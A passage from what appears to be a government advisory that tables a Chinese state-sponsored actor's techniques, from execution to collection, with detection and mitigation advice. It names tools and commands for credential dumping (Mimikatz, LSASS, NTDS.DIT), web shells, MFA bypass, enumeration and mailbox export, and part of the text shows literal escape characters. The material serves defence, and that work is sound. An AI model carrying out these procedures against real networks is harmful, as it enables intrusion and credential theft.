Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtasks` or `crontab`, to create and schedule tasks that enumerate victim devices and networks.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

|

 * Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
 * Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in `%systemroot%\System32\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities, such as PowerShell or Windows Management Instrumentation (WMI), that do not conform to typical administrator or user actions.

|

Detect:

 * Platform Monitoring
 * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)]
 * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]
 * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]
 * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

Isolate:

 * Execution Isolation
 * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]

 * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
 * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]

|

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience.
These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

|

 * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
 * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
 * Use a domain reputation service to detect and block suspicious or malicious domains.
 * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.

|

Detect:

 * File Analysis
 * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
 * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
 * Identifier Analysis
 * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
 * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * Network Traffic Analysis
 * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]

Isolate:

 * Execution Isolation
 * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
 * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
 * Network Isolation
 * DNS Denylisting
[[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
 * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]

_Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]:

 * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]

|

Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

|

 * Disallow loading of remote DLLs.
 * Enable safe DLL search mode.
 * Implement tools for detecting search order hijacking opportunities.
 * Use application allowlisting to block unknown DLLs.
 * Monitor the file system for created, moved, and renamed DLLs.
 * Monitor for changes in system DLLs not associated with updates or patches.
 * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).

|

Detect:

 * Platform Monitoring
 * Operating System Monitoring
 * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
 * Process Analysis
 * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
 * Executable
Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]

 * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]

|

Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].

|

 * Monitor for policy changes to authentication mechanisms used by the domain controller.
 * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
 * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
 * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
 * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
 * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer.
Monitor for and correlate changes to Registry entries.

|

Detect:

 * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
 * User Behavior Analysis
 * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
 * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]

Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]:

 * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]

|

Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.

|

 * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
 * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
 * Perform integrity checks on critical servers to identify and investigate unexpected changes.
 * Have application developers sign their code using digital signatures to verify their identity.
 * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
 * Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
 * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
 * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked.
Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
 * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
 * Establish, and back up offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
 * Employ user input validation to restrict exploitation of vulnerabilities.
 * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
 * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.

|

Detect:

 * Network Traffic Analysis
 * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
 * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
 * Process Analysis
 * Process Spawn Analysis
 * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

 * Network Isolation
 * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:

 * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]

|

Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

**Note:** this technique also applies to Privilege Escalation
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. 
Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. 
Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need them; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defense Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process 
Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. 
\n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed 
using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] 
\n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active Directory (`NTDS.DIT`) for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NTDS.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware system requirements. 
\n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. 
WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. 
\n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and 
Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used 
compression and encryption of exfiltration files into RAR archives, and subsequently utilized cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and executed `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. 
excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) 
to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportRequest` PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol 